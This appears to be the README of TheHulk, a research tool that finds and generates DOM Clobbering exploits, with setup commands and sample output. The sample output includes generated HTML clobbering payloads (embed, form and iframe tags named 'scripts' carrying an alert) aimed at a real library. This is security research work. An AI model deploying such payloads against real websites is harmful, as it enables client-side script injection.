TheHulk is a dynamic analysis tool designed to detect and exploit DOM Clobbering vulnerabilities.
TheHulk operates in three key phases:
-
Gadget Detection with Dynamic Taint Analysis: TheHulk performs dynamic taint analysis in the browser to track dangerous dataflows at runtime for a given input URL.
-
Exploit Generation with Symbolic DOM: Using the recorded taint traces from the first phase, TheHulk collects and solves constraints along the trace to generate DOM Clobberable HTML markups as exploits.
-
Exploit Verification: TheHulk injects the generated HTML payload into the target webpage and hooks the dangerous sinks to verify exploitability.
To install TheHulk, follow these steps:
git clone --recursive https://github.com/jackfromeast/TheHulk.git
- Run the installation script:
cd TheHulk && ./install.sh
-
Install the mitm-proxy certificate: To instrument the HTTPS traffic with mitmproxy, you would need to install the mitm-proxy's certificate in our system and browsers (for Chrome) to avoid any complain about untrusted certificates. To do so, please follow: https://docs.mitmproxy.org/stable/concepts-certificates/#:~:text=chrome
-
Basic Test for installation:
./tasks/ae-run-basic-check/run.sh
TheHulk can be run in two modes: as a standalone module or as a pipeline task.
Running TheHulk with Tasks
Tasks helps you define the input, output, and configurations of an analysis task for better pipeline orchestration. A typical task directory includes the following components:
inputfolder: Holds the list of URLs for analysis.outputfolder: Stores the analysis results for each site or page.callbacksfolder: Contains JavaScript-defined callback functions that the crawler invokes during execution.config.browser.ymlfile: Configuration file for the taint analysis engine.config.scheduler.ymlfile: Configuration file for the crawler.run.shfile: Entrypoint script to start the task.
For example, to detect and exploit the gadgets in the DOM Clobbering collection, you could simply:
- Update the two configuration files located at
tasks/ae-run-gadget-detection-e1.
- 1-1. Update the
WORKSPACEpath to specify where the output folders will be placed. - 1-2. Config the inputs, browser configs and callbacks if necessary (can be skiped).
- Start the task:
./tasks/ae-run-gadget-detection-e1/run.sh
Running Dynamic Taint Engine Only
Even Hulk is designed to detect DOM Clobbering gadgets, its dynamic taint engine can be generilzed to detect other client-side vulnerabilities. The source code of the taint engine is located at: gadget-detection/runtime-analysis/src.
- Update the configuration file located at
gadget-detection/browser/config.browser.yml.
- 1-1. Update the
WORKSPACEpath to specify where the output folders will be placed. - 1-2. Config the inputs, browser configs and callbacks if necessary (can be skiped).
- Start the taint-aware browser:
./gadget-detection/run.sh
Note: You can adjust the '--force-device-scale-factor=1.75' argument in the configuration file to change the browser's resolution. This setting provides optimal resolution for checking the source code, but it might be too large for viewing web pages. Adjust as necessary for your display.
Running Exploit Generation Module Only
To generate DOM Clobberable HTML markups from a taint trace using the following command:
node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json
Below is a screenshot of an analysis result for detecting a DOM Clobbering gadget in the Google Client API Library.
The exploit generation output:
$ node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json -c exploit-gen/src/tests/motivating-example-conditions.json
====================
<embed name="scripts">
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
<form name="scripts"></form>
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
DOM Clobbering Collection is list of wildly-used client-side libraries with DOM clobbering gadgets that found by Thehulk.
The dataset is available at https://github.com/jackfromeast/dom-clobbering-collection.